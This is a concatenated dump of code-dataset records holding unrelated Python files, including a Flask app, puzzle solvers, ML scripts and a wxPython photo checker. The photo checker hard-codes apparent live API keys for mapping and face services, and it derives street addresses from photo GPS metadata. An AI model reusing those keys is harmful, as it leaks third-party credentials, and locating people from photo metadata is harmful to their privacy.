Flask(__name__)\nfoods=[\n {\"name\":\"Pizza\",\"price\":20,\"id\":1},\n {\"name\":\"Chicken\",\"price\":15,\"id\":2},\n {\"name\":\"Rice\",\"price\":2,\"id\":3}\n]\n@app.route(\"/\",methods=[\"GET\"])\ndef index():\n return render_template(\"food.html\",FOODS=foods) \n\n@app.route('/delete/')\ndef delete_food(food_id):\n for v in foods:\n if v[\"id\"]==int(food_id):\n foods.remove(v)\n break\n return redirect(url_for('index'))\n@app.route(\"/\",methods=['POST'])\ndef post_food():\n food_name=request.form.get('name')\n food_price=request.form.get('price')\n food_id=foods[len(foods)-1]['id']+1\n foods.append({'name':food_name,'price':food_price,'id':food_id})\n return redirect(url_for('index'))\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"thuchimney292/thutran-web-lesson2","sub_path":"food.py","file_name":"food.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38206422785","text":"#!/usr/bin/env python\n\nfrom lib import crt\nfrom functools import reduce\nimport re\n\nif __name__ == '__main__':\n with open('../input.txt', 'r') as f:\n input_list = f.readlines()\n\n pattern = \"Disc #[0-9]+ has ([0-9]+) positions; at time=0, it is at position ([0-9]+).\"\n regex = [ re.search(pattern, line) for line in input_list]\n init = [(int(r.group(2)), int(r.group(1))) for r in regex] \n\n def solve_cong(xs):\n congs = [(-disc[0]-i-1, disc[1]) for i, disc in enumerate(xs)]\n return reduce(crt, congs)[0]\n\n p1 = solve_cong(init)\n init.append((0, 11))\n p2 = solve_cong(init)\n\n print(f\"Part 1 answer: {p1}\")\n print(f\"Part 2 answer: {p2}\")\n","repo_name":"chenson2018/advent-of-code","sub_path":"2016/15/python/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42788592995","text":"import json\nwith open('estoque.json', 'r') as arquivo:\n estoque = arquivo.read()\ndicionario = json.loads(estoque)\nprodutos = dicionario['produtos']\nvalor = 0\nfor d in produtos:\n valor += float(d['quantidade'])*float(d['valor'])\nprint(valor)\n ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_170/ch159_2020_05_02_17_30_48_003716.py","file_name":"ch159_2020_05_02_17_30_48_003716.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11372403102","text":"import networkx as nx\n\nclass NetworkEstimator(object):\n\n _data = None\n\n def fit(self, data):\n self._data = data\n\n def to_network(self, threshold, additional_attributes=None):\n \"\"\"\n Returns networkx network of the graph generated by the method, thresholded at threshold\n :param threshold: threshold to put on the adjacency matrix (adjacencies > threshold will have an edge)\n :param additional_attributes: other attributes to apply to edges (dict)\n :return:\n \"\"\"\n graph = nx.Graph()\n\n for node in self._data.index:\n graph.add_node(node)\n\n adjacency = self.adjacency_\n true_interactions = adjacency > threshold\n # leave only the ones that have interaction=True\n adjacency = adjacency[true_interactions]\n\n if additional_attributes is None:\n additional_attributes = {}\n\n for (node_a, node_b), weight in adjacency.iteritems():\n kwargs = additional_attributes.get((node_a, node_b), {})\n\n graph.add_edge(node_a, node_b, weight=weight, **kwargs)\n\n return graph\n\n def p_values(self):\n raise NotImplementedError","repo_name":"lukauskas/publications-lukauskas-2024-marcs","sub_path":"00-main-results/src/snapanalysis/models/network/network_estimator.py","file_name":"network_estimator.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71960761652","text":"\"\"\"\nProject Euler Problem 67: Maximum path sum II\n\nBy starting at the top of the triangle below and moving to adjacent numbers on the row below, the maximum total from top to bottom is 23.\n\n3\n7 4\n2 4 6\n8 5 9 3\n\nThat is, 3 + 7 + 4 + 9 = 23.\n\nFind the maximum total from top to bottom in triangle.txt (right click and 'Save Link/Target As...'), a 15K text file containing a triangle with one-hundred rows.\n\nNOTE: This is a much more difficult version of Problem 18. It is not possible to try every route to solve this problem, as there are 299 altogether!\nIf you could check one trillion (1012) routes every second it would take over twenty billion years to check them all.\nThere is an efficient algorithm to solve it. ;o)\n\"\"\"\n\n# Code adapted from 018_maximum_path_sum_i.py.\n\nimport numpy as np\n\n# Parse triangle numbers.\ntriangleList = []\nwith open('imports/p067_triangle.txt') as f:\n for triangleString in f:\n triangleList.append(list(map(int, triangleString.split(' '))))\n\n# Find number of lines in triangle.\nlinesNum = len(triangleList[-1])\n\n# Start from last line. Choose between side to side numbers (keep larger). Decrease elements linearly by summation.\nfor lineNum in range(linesNum-1, 0, -1):\n for k in range(len(triangleList[lineNum])-1):\n triangleList[lineNum-1][k] += max(triangleList[lineNum][k], triangleList[lineNum][k+1])\n\nprint(triangleList[0][0])\n","repo_name":"biancaleeyx/projectEuler","sub_path":"067_maximum_path_sum_ii.py","file_name":"067_maximum_path_sum_ii.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17419547316","text":"from lxml import etree\r\nimport chord\r\nimport time\r\n\r\nsvg = etree.parse(\"nextstrain_ncov_global.svg\")\r\nroot = svg.getroot()\r\ncountries = {}\r\nfor element in root:\r\n #print(element.get(\"id\"))\r\n if (element.get(\"id\") == \"treeLegend\"):\r\n lastColor = 0\r\n for country in element.iter():\r\n #print(country.tag)\r\n #print(country.text)\r\n if(country.tag == \"{http://www.w3.org/2000/svg}rect\"):\r\n lastColor = country.get(\"stroke\")\r\n if(country.tag == \"{http://www.w3.org/2000/svg}title\"):\r\n #print(str(country.text) + \" \" + str(lastColor))\r\n countries[country.text] = {\"color\":lastColor, \"coordinates\":\"\"}\r\n\r\npaths = []\r\ncountries['South America']['coordinates'] = '449,365'\r\nfor element in root:\r\n if (element.get(\"id\") == \"map\"):\r\n for div in element.iter():\r\n #print(element.tag)\r\n if (div.tag == \"{http://www.w3.org/2000/svg}circle\"):\r\n #print(\"circle\")\r\n transform = div.get(\"transform\")\r\n thisCoordinate = transform.split('(')[1][:-1]\r\n thisX = int(thisCoordinate.split(',')[0])%1024\r\n thisCoordinate = str(thisX)+','+thisCoordinate.split(',')[1]\r\n style = str(div.get(\"style\")).split()\r\n thisColor = style[1+style.index(\"stroke:\")] + ' ' + style[2+style.index(\"stroke:\")] + ' ' + style[3+style.index(\"stroke:\")][:-1]\r\n for country in countries:\r\n if (countries[country][\"color\"] == thisColor):\r\n countries[country][\"coordinates\"]=thisCoordinate\r\n #print(countries[country])\r\n print(\"countries\")\r\n print(countries)\r\n for div in element.iter():\r\n if (div.tag == \"{http://www.w3.org/2000/svg}path\"):\r\n data = str(div.get(\"d\")).split('L')\r\n countryA = data[0][1:]\r\n thisX = int(countryA.split(',')[0])%1024\r\n countryA = str(thisX)+','+countryA.split(',')[1]\r\n countryB = data[-1]\r\n thisX = int(countryB.split(',')[0])%1024\r\n countryB = str(thisX)+','+countryB.split(',')[1]\r\n style = str(div.get(\"style\")).split()\r\n thisColor = style[1+style.index(\"stroke:\")] + ' ' + style[2+style.index(\"stroke:\")] + ' ' + style[3+style.index(\"stroke:\")][:-1]\r\n for country in countries:\r\n if (countries[country][\"color\"] == thisColor):\r\n thisColor = country\r\n if (countryA == countries[country][\"coordinates\"]):\r\n countryA = country\r\n if (countryB == countries[country][\"coordinates\"]):\r\n countryB = country\r\n src = thisColor\r\n dest = countryA\r\n if (src == dest):\r\n dest = countryB\r\n paths.append({\"src\":src, \"dest\":dest})\r\n #if(src == \"Japan\" or dest==\"Japan\"):\r\n #print(paths[-1])\r\n if(not all(x.isalpha() or x.isspace() for x in dest) or not all(x.isalpha() or x.isspace() for x in src)):\r\n print(paths[-1])\r\n \r\nrelationalMatrix = [[0]*len(countries) for x in range(len(countries))]\r\n#print(relationalMatrix)\r\ncountryList = list(countries.keys())\r\nfor path in paths:\r\n relationalMatrix[countryList.index(path[\"src\"])][countryList.index(path[\"dest\"])]+=1\r\nsmallMatrix = []\r\nfor i in range(6):\r\n smallMatrix.append(relationalMatrix[i][0:5])\r\nprint(relationalMatrix)\r\nprint(smallMatrix)\r\nchord.Chord(relationalMatrix, countryList, wrap_labels=False, font_size=\"8px\", font_size_large=\"8px\").to_html()\r\n\r\n\r\nimport plotly.graph_objects as go\r\n\r\ndef make_sankey(countryName):\r\n links = dict(\r\n source = [],\r\n target = [],\r\n value = [],\r\n hovertemplate='%{value} strains have spread from %{source.label} to %{target.label}' \r\n )\r\n countryIndex = countryList.index(countryName)\r\n myCountryList = [countryName]\r\n for i in range(len(countryList)):\r\n if (i == countryIndex):\r\n if (relationalMatrix[i][i]>0):\r\n links[\"source\"].append(0)\r\n links[\"target\"].append(0)\r\n links[\"value\"].append(relationalMatrix[i][i])\r\n else:\r\n if (relationalMatrix[countryIndex][i]>0):\r\n #myCountryList.append(\"\" + str(countryList[i]) + \"\")\r\n myCountryList.append(str(countryList[i]))\r\n links[\"source\"].append(0)\r\n links[\"target\"].append(len(myCountryList)-1)\r\n links[\"value\"].append(relationalMatrix[countryIndex][i])\r\n if (relationalMatrix[i][countryIndex]>0):\r\n #myCountryList.append(\"\" + str(countryList[i]) + \"\")\r\n myCountryList.append(str(countryList[i]))\r\n links[\"source\"].append(len(myCountryList)-1)\r\n links[\"target\"].append(0)\r\n links[\"value\"].append(relationalMatrix[i][countryIndex])\r\n fig = go.Figure(data=[go.Sankey(\r\n node = dict(\r\n pad = 15,\r\n thickness = 20,\r\n line = dict(color = \"black\", width = 0.5),\r\n label = myCountryList,\r\n color = \"blue\",\r\n hovertemplate='%{label}: %{value}'\r\n ),\r\n link = links\r\n )])\r\n\r\n fig.update_layout(title_text= str(countryName) + \" Sankey Diagram\", font_size=10)\r\n fig.write_html(str(countryName) + '_sankey.html', auto_open=False)\r\n\r\nfor country in countryList:\r\n make_sankey(country)\r\n","repo_name":"micah-kitzler/CovidData","sub_path":"Sankey Chart Maker/next_strain_analysis.py","file_name":"next_strain_analysis.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26995105261","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import accuracy_score\n# from matplotlib import pyplot as plt\n# from pandas.plotting import scatter_matrix\n\n\nMyInternationalData = pd.read_csv('international_matches.csv')\n\n\ndef createList():\n global MyInternationalData\n Teams = MyInternationalData['home_team']\n FIFARank = MyInternationalData['home_team_fifa_rank']\n FIFAPoints = MyInternationalData['home_team_total_fifa_points']\n TeamsForProcess = list(zip(Teams , FIFARank , FIFAPoints))\n TeamsForProcess.reverse()\n return TeamsForProcess\nTeamsForProcess = createList()\n\ndef Versus(home , away , Teams):\n homebool = 0\n awaybool = 0\n hometeam = ()\n awayteam = ()\n for i in Teams:\n if(homebool == 0):\n if(i[0] == home):\n homebool = 1\n hometeam = i\n if(awaybool == 0):\n if(i[0] == away):\n awaybool = 1\n awayteam = i\n if(awaybool and homebool == 1 ):\n return hometeam , awayteam\ndef Predict(Home , Away ,Teams):\n global MyInternationalData\n x = MyInternationalData.drop(columns=['home_team_continent' ,'away_team_continent', \n 'home_team' , 'away_team' ,'home_team_score' ,\t'away_team_score' , 'home_team_result' , 'date' , 'tournament' ,\t'city' ,\n 'country' , 'neutral_location' ,\t'shoot_out' , 'home_team_goalkeeper_score'\t,'away_team_goalkeeper_score'\t,\n 'home_team_mean_defense_score'\t,'home_team_mean_offense_score'\t,'home_team_mean_midfield_score'\t,'away_team_mean_defense_score'\t,\n 'away_team_mean_offense_score',\t'away_team_mean_midfield_score'])\n y = MyInternationalData['home_team_result']\n\n X_train, X_test, Y_train, Y_test = train_test_split(x, y, test_size=0.2, random_state=42)\n model = KNeighborsClassifier(n_neighbors=42)\n fit = model.fit(X_train, Y_train)\n result = model.predict(X_test)\n accuracyScore = accuracy_score(Y_test , result)\n home , away = Versus(Home , Away , Teams)\n result = model.predict(\n [[\n home[1] , away[1] , home[2] ,away[2]\n ]]\n )\n return result\n # print(accuracyScore)\n\n# MyInternationalData = MyInternationalData.drop(columns=['home_team_continent' ,'away_team_continent', \n# 'home_team' , 'away_team' ,'home_team_score' ,\t'away_team_score' , 'home_team_result' , 'date' , 'tournament' ,\t'city' ,\n# 'country' , 'neutral_location' ,\t'shoot_out' , 'home_team_goalkeeper_score'\t,'away_team_goalkeeper_score'\t,\n# 'home_team_mean_defense_score'\t,'home_team_mean_offense_score'\t,'home_team_mean_midfield_score'\t,'away_team_mean_defense_score'\t,\n# 'away_team_mean_offense_score',\t'away_team_mean_midfield_score'])\n# scatter_matrix(MyInternationalData, figsize=(12, 8))\n# MyInternationalData.plot()\n# plt.show()\n\n#print Accuracy\n# Predict(\"\" , \"\" , TeamsForProcess )\n\n\n","repo_name":"ahmedromia-oss/Machine-learning-web-app-predict-football-match-winner","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21116610595","text":"\nimport os\n\n\nfilenames = os.listdir('./data')\nprint()\nwith open('merged.txt', 'w') as outfile:\n for fname in filenames:\n if '.txt' in fname:\n with open('./data/' +fname) as infile:\n outfile.write(infile.read())\n","repo_name":"ketankokane94/datastructures_algos","sub_path":"project_2/code/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24017049472","text":"'''import torch\nimport torchvision.transforms as transforms\nimport cv2\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport torchvision.models as models\nimport torch.nn as nn\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\n\ndevice = torch.device(\"cpu\")\nclasses = [\"cat\", \"dog\", \"elephant\", \"panda\"]\n\nmodel_ft = models.resnet50(pretrained=True)\nnum_ftrs = model_ft.fc.in_features\nmodel_ft.fc = nn.Linear(num_ftrs, 4)\n\nmodel_ft.load_state_dict(torch.load(f=r\"F:\\EmbeddedProject\\Classification\\classifier.pth\", map_location=torch.device('cpu')))\n\nimg = cv2.imread(r\"F:\\EmbeddedProject\\Classification\\DATASET\\test\\panda\\panda_00017.jpg\")\nimg1 = cv2.resize(img,(224, 224))\nimg2 = torch.tensor(img1)\nimg3 = torch.reshape(img2, (1, 3, 224, 224))\n\nout = model_ft(img3.float())\nout = list(out.detach().numpy()[0])\n\nplt.imshow(img, cmap='gray')\nplt.title(classes[out.index(max(out))])\nplt.show()'''\nimport torch\nimport torchvision\nimport torch.nn as nn\nfrom torchvision import transforms\nimport torch.utils.data as data\nimport torchvision.models as models\n\n\ndef DATA_LOADER():\n #train_folder = r\"F:\\EmbeddedProject\\Classification\\DATASET\\train\"\n #test_folder = r\"F:\\EmbeddedProject\\Classification\\DATASET\\test\"\n BATCH_SIZE = 10\n Transforming = transforms.Compose([\n transforms.Resize((128, 128)),\n transforms.RandomHorizontalFlip(),\n transforms.RandomVerticalFlip(),\n transforms.RandomRotation((30, 120)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5, 0.4, 0.5], std=[0.22, 0.24, 0.22])])\n train_data = torchvision.datasets.ImageFolder(root=r\"F:\\EmbeddedProject\\Classification\\DATASET\\train\", transform=Transforming)\n test_data = torchvision.datasets.ImageFolder(root=r\"F:\\EmbeddedProject\\Classification\\DATASET\\test\", transform=Transforming)\n train_loader = data.DataLoader(train_data, batch_size=BATCH_SIZE, shuffle=True)\n test_loader = data.DataLoader(test_data, batch_size=BATCH_SIZE, shuffle=True)\n return train_loader, test_loader\n\ntrain_loader, test_loader = DATA_LOADER()\ndataiter = iter(test_loader)\nimages, labels = dataiter.next()\n\nmodel_ft = models.resnet50(pretrained=True)\nnum_ftrs = model_ft.fc.in_features\nmodel_ft.fc = nn.Linear(num_ftrs, 4)\n\nmodel_ft.load_state_dict(torch.load(f=r\"F:\\EmbeddedProject\\Classification\\classifier.pth\", map_location=torch.device('cpu')))\n\ncorrect = 0\ntotal = 0\nwith torch.no_grad():\n for data in test_loader:\n images, labels = data\n outputs = model_ft(images)\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\nprint('Accuracy of the network on test images: %d %%' % (100 * correct / total))\n","repo_name":"Manonmani-PL/animal_posture_detection","sub_path":"code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73533982773","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\nimport wx\r\nimport wx.adv\r\nimport os\r\nimport random\r\nimport time\r\nfrom PIL import Image\r\nimport math\r\nimport hashlib\r\nimport urllib.parse\r\nfrom urllib.parse import urlencode\r\nimport urllib.response\r\nfrom urllib.request import urlopen\r\nimport base64\r\nimport json\r\nimport requests \r\nimport cv2\r\nimport numpy as np\r\nimport exifread\r\nfrom decimal import Decimal\r\nfrom position_utils import *\r\nimport datetime\r\n\r\ndef create(parent):\r\n return Frame1(parent)\r\n\r\n[wxID_FRAME1, \r\n wxID_FRAME1BEAUTY, \r\n wxID_FRAME1BTN_CLEAR, \r\n wxID_FRAME1BTN_TEST_BEAUTY, \r\n wxID_FRAME1BTN_TEST_POSION, \r\n wxID_FRAME1GENERICDIRCTRL1,\r\n wxID_FRAME1PANEL1,\r\n wxID_FRAME1SASHLAYOUTWINDOW1, \r\n wxID_FRAME1TEXTRETURN, \r\n] = [wx.NewId() for _init_ctrls in range(9)]\r\n\r\nclass Frame1(wx.Frame):\r\n def _init_ctrls(self, prnt):\r\n # generated method, don't edit\r\n wx.Frame.__init__(self, id=wxID_FRAME1, name='', parent=prnt,\r\n pos=wx.Point(438, 55), size=wx.Size(873, 704),\r\n style=wx.DEFAULT_FRAME_STYLE, title=u'pic_check')\r\n self.SetClientSize(wx.Size(857, 665))\r\n self.Bind(wx.EVT_SIZE, self.OnFrame1Size)\r\n\r\n self.panel1 = wx.Panel(id=wxID_FRAME1PANEL1, name='panel1', parent=self,\r\n pos=wx.Point(392, -8), size=wx.Size(463, 664),\r\n style=wx.TAB_TRAVERSAL)\r\n self.panel1.SetMinSize(wx.Size(455, 778))\r\n\r\n self.sashLayoutWindow1 = wx.adv.SashLayoutWindow(id=wxID_FRAME1SASHLAYOUTWINDOW1,\r\n name='sashLayoutWindow1', parent=self, pos=wx.Point(0, 0),\r\n size=wx.Size(392, 664), style=wx.CLIP_CHILDREN|wx.adv.SW_3D)\r\n self.sashLayoutWindow1.SetAlignment(wx.adv.LAYOUT_LEFT)\r\n self.sashLayoutWindow1.SetOrientation(wx.adv.LAYOUT_VERTICAL)\r\n self.sashLayoutWindow1.SetSashVisible(wx.adv.SASH_RIGHT, True)\r\n self.sashLayoutWindow1.SetDefaultSize(wx.Size(392, 664))\r\n self.sashLayoutWindow1.Bind(wx.adv.EVT_SASH_DRAGGED,\r\n self.OnSashLayoutWindow1SashDragged,\r\n id=wxID_FRAME1SASHLAYOUTWINDOW1)\r\n\r\n self.textReturn = wx.TextCtrl(id=wxID_FRAME1TEXTRETURN,\r\n name=u'textReturn', parent=self.panel1, pos=wx.Point(104, 0),\r\n size=wx.Size(1110, 1050), style=wx.TE_MULTILINE, value='')\r\n\r\n self.genericDirCtrl1 = wx.GenericDirCtrl(defaultFilter=0, dir='.',\r\n filter=u'Fichier png(*.png,*.jpg)|*.png;*.jpg',\r\n id=wxID_FRAME1GENERICDIRCTRL1, name='genericDirCtrl1',\r\n parent=self.sashLayoutWindow1, pos=wx.Point(0, 0),\r\n size=wx.Size(392, 664),\r\n style=wx.DIRCTRL_3D_INTERNAL | wx.SUNKEN_BORDER)\r\n self.genericDirCtrl1.SetMinSize(wx.Size(270, 664))\r\n self.genericDirCtrl1.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnSel)\r\n\r\n self.btn_test_posion = wx.Button(id=wxID_FRAME1BTN_TEST_POSION,\r\n label=u'\\u4f4d\\u7f6e\\u68c0\\u6d4b', name=u'btn_test_posion',\r\n parent=self.panel1, pos=wx.Point(16, 116), size=wx.Size(75, 24),\r\n style=0)\r\n self.btn_test_posion.Bind(wx.EVT_BUTTON, self.Onbtn_test_posionButton,\r\n id=wxID_FRAME1BTN_TEST_POSION)\r\n\r\n self.btn_test_beauty = wx.Button(id=wxID_FRAME1BTN_TEST_BEAUTY,\r\n label=u'\\u989c\\u503c\\u68c0\\u6d4b', name=u'btn_test_beauty',\r\n parent=self.panel1, pos=wx.Point(16, 176), size=wx.Size(75, 24),\r\n style=0)\r\n self.btn_test_beauty.Bind(wx.EVT_BUTTON, self.Onbtn_test_beautyButton,\r\n id=wxID_FRAME1BTN_TEST_BEAUTY)\r\n\r\n self.btn_clear = wx.Button(id=wxID_FRAME1BTN_CLEAR,\r\n label=u'\\u6e05\\u7a7a\\u7ed3\\u679c', name=u'btn_clear',\r\n parent=self.panel1, pos=wx.Point(16, 236), size=wx.Size(75, 24),\r\n style=0)\r\n self.btn_clear.Bind(wx.EVT_BUTTON, self.Onbtn_clearButton,\r\n id=wxID_FRAME1BTN_CLEAR)\r\n\r\n\r\n\r\n def __init__(self, parent):\r\n self._init_ctrls(parent)\r\n self.FileName=None\r\n self.gender =0\r\n\r\n def checkStatusRange(self, event):\r\n return event.GetDragStatus() != wx.SASH_STATUS_OUT_OF_RANGE\r\n\r\n def doLayout(self):\r\n wx.adv.LayoutAlgorithm().LayoutWindow(self, self.panel1)\r\n self.panel1.Refresh()\r\n \r\n def OnWxframe1Size(self, event):\r\n self.doLayout()\r\n\r\n def OnSashLayoutWindow1SashDragged(self, event):\r\n if self.checkStatusRange(event):\r\n self.sashLayoutWindow1.SetDefaultSize(wx.Size(event.GetDragRect().width, 1000))\r\n self.doLayout()\r\n event.Skip()\r\n\r\n def OnSashLayoutWindow2SashDragged(self, event):\r\n if self.checkStatusRange(event):\r\n self.sashLayoutWindow2.SetDefaultSize(wx.Size(event.GetDragRect().width, 1000))\r\n self.doLayout()\r\n event.Skip()\r\n\r\n def OnFrame1Size(self, event):\r\n self.doLayout()\r\n event.Skip()\r\n\r\n \r\n def OnSel(self, event):\r\n self.FileName = self.genericDirCtrl1.GetFilePath()\r\n \r\n def Onbtn_clearButton(self, event):\r\n self.textReturn.Clear()\r\n event.Skip()\r\n\r\n def get_address(self, location):\r\n api_key = \"516453e417b50bcf6716040c234b6c1f\"\r\n url_get_position = 'https://restapi.amap.com/v3/geocode/regeo?key={}&location={}'\r\n resp = requests.get(url_get_position.format(api_key, location))\r\n location_data = json.loads(resp.text)\r\n address = location_data.get('regeocode').get('formatted_address')\r\n return address\r\n\r\n def format_lati_long_data(self, data):\r\n data_list_tmp = str(data).replace('[', '').replace(']', '').split(',')\r\n data_list = [data.strip() for data in data_list_tmp]\r\n data_tmp = data_list[-1].split('/')\r\n data_sec = int(data_tmp[0]) / int(data_tmp[1]) / 3600\r\n data_tmp = data_list[-2]\r\n data_minute = int(data_tmp) / 60\r\n data_degree = int(data_list[0])\r\n result = \"%.6f\" % (data_degree + data_minute + data_sec)\r\n return float(result)\r\n\r\n def get_image_ability(self,img):\r\n img_exif = exifread.process_file(open(img, 'rb'))\r\n\r\n if img_exif:\r\n latitude_gps = img_exif['GPS GPSLatitude']\r\n latitude_direction = img_exif['GPS GPSLatitudeRef']\r\n longitude_gps = img_exif['GPS GPSLongitude']\r\n longitude_direction = img_exif['GPS GPSLongitudeRef']\r\n take_time = img_exif['EXIF DateTimeOriginal']\r\n format_time = str(take_time).split(\" \")[0].replace(\":\", \"-\")\r\n self.textReturn.AppendText('date : '+ format_time+'\\n')\r\n\r\n if latitude_gps and longitude_gps and take_time:\r\n latitude = self.format_lati_long_data(latitude_gps)\r\n longitude = self.format_lati_long_data(longitude_gps)\r\n location = wgs84togcj02(longitude, latitude)\r\n\r\n return f'{location[0]},{location[1]}'\r\n else:\r\n self.textReturn.AppendText('图片属性不完整。\\n')\r\n return ''\r\n else:\r\n self.textReturn.AppendText('图片不是原图。\\n')\r\n return ''\r\n\r\n def location(self, img):\r\n coordinate = self.get_image_ability(img)\r\n if not coordinate:\r\n return\r\n address = self.get_address(coordinate)\r\n self.textReturn.AppendText('address:'+ address+'\\n')\r\n\r\n def Onbtn_test_posionButton(self, event):\r\n if os.path.isfile(self.FileName):\r\n self.textReturn.AppendText(self.FileName+'\\n')\r\n self.location(self.FileName)\r\n\r\n event.Skip()\t\r\n\t\r\n def get_params(self,img): \r\n params = {'app_id':'1106941552', \r\n 'image':img, \r\n 'mode':'0' , \r\n 'time_stamp':str(int(time.time())), \r\n 'nonce_str':str(int(time.time())), \r\n }\r\n\r\n sort_dict= sorted(params.items(), key=lambda item:item[0], reverse = False) \r\n sort_dict.append(('app_key','ecTptvOyErjHiNgo')) \r\n rawtext= urlencode(sort_dict).encode() \r\n sha = hashlib.md5() \r\n sha.update(rawtext)\r\n md5text= sha.hexdigest().upper() \r\n params['sign']=md5text \r\n return params \r\n\r\n def resize_image(self, origin_img, optimize_img, threshold):\r\n with Image.open(origin_img) as im:\r\n width, height = im.size\r\n file_size = width*height\r\n if file_size > threshold:\r\n \r\n if width >= height:\r\n new_width = int(math.sqrt(threshold / 2))\r\n new_height = int(new_width * height * 1.0 / width)\r\n else:\r\n new_height = int(math.sqrt(threshold / 2))\r\n new_width = int(new_height * width * 1.0 / height)\r\n\r\n resized_im = im.resize((new_width, new_height))\r\n resized_im.save(optimize_img)\r\n else:\r\n im.save(optimize_img) \r\n\r\n def Onbtn_test_beautyButton(self, event):\r\n if os.path.isfile(self.FileName):\r\n self.textReturn.AppendText(self.FileName+'\\n')\r\n \r\n self.resize_image(self.FileName, 'optimized.jpg', 1024*1024)\r\n \r\n frame=cv2.imread('optimized.jpg')\r\n nparry_encode = cv2.imencode('.jpg', frame)[1]\r\n data_encode = np.array(nparry_encode)\r\n img = base64.b64encode(data_encode) \r\n\r\n params = self.get_params(img) \r\n\r\n url = \"https://api.ai.qq.com/fcgi-bin/face/face_detectface\"\r\n res = requests.post(url,params).json()\r\n if res['ret'] == 0:\r\n for face in res['data']['face_list']:\r\n #print(face)\r\n x=face['x']\r\n y=face['y']\r\n w=face['width']\r\n h=face['height']\r\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,255,255),2)\r\n cv2.putText(frame,'age :'+str(face['age']), (x, y+h+20), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2,cv2.LINE_8, 0)\r\n cv2.putText(frame,'beauty:'+str(face['beauty']), (x, y+h+40), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2,cv2.LINE_8, 0)\r\n self.textReturn.AppendText('face_id: '+ str(face['face_id'])+'\\n')\r\n self.textReturn.AppendText('gender: '+ str(face['gender'])+'\\n')\r\n self.textReturn.AppendText('age : '+ str(face['age'])+'\\n')\r\n self.textReturn.AppendText('beauty : '+ str(face['beauty'])+'\\n')\r\n self.textReturn.AppendText('smile : '+ str(face['expression'])+'\\n')\r\n\t\t\t\t\r\n cv2.imshow('img',frame)\r\n cv2.imwrite('optimized.jpg',frame)\r\n cv2.waitKey(0)\r\n else:\r\n self.textReturn.AppendText('no face\\n')\r\n \r\n event.Skip()\r\n\r\n\r\n","repo_name":"kinghows/Alpha-P","sub_path":"AD_Frame1.py","file_name":"AD_Frame1.py","file_ext":"py","file_size_in_byte":11093,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"19712352585","text":"import pandas as pd\nimport torch\nfrom torch.utils.data import Dataset\nfrom transformers import BertJapaneseTokenizer\n\ntokenizer = BertJapaneseTokenizer.from_pretrained('bert-base-japanese-whole-word-masking')\nmax_len = 50\n\ndef convert_sentence_to_ids(sentence):\n sentence = '[CLS] ' + sentence + ' [SEP]'\n sentence_tokens = tokenizer.tokenize(sentence)\n sentence_ids = tokenizer.convert_tokens_to_ids(sentence_tokens)\n sentence_len = len(sentence_ids)\n if sentence_len < max_len + 1:\n sentence_ids += [0] * (max_len - sentence_len)\n\n return torch.tensor(sentence_ids, dtype=torch.long), sentence_len\n\n\ndef load_ids_and_labels(row, task):\n context, context_len = convert_sentence_to_ids(row['Context'])\n\n image_path = row['Image']\n gaze = torch.tensor([row['EyeX'], row['EyeY'], row['GazeX'], row['GazeY']])\n\n response = row['Action'] if task == 'action' else row['Response']\n response, response_len = convert_sentence_to_ids(response)\n\n label = torch.tensor([row['Label']], dtype=torch.float32)\n\n return context, context_len, image_path, gaze, response, response_len, label\n\ndef test_load_ids(i, row):\n context, context_len = convert_sentence_to_ids(row['Context'])\n\n image_path = row['Image']\n gaze = torch.tensor([row['EyeX'], row['EyeY'], row['GazeX'], row['GazeY']])\n\n response, response_len = convert_sentence_to_ids(row[i])\n\n return context, context_len, image_path, gaze, response, response_len\n\nclass MmdBertDataset(Dataset):\n def __init__(self, path, task, train):\n self.crl = []\n for _, row in pd.read_csv(path).iterrows():\n if 'test_10.csv' in path:\n for i in range(6, 16):\n self.crl.append(test_load_ids(i, row))\n else:\n self.crl.append(load_ids_and_labels(row, task))\n\n def __len__(self):\n return len(self.crl)\n\n def __getitem__(self, idx):\n return self.crl[idx]\n","repo_name":"hisas/mmd","sub_path":"mmd_bert_dataset.py","file_name":"mmd_bert_dataset.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40327412377","text":"import 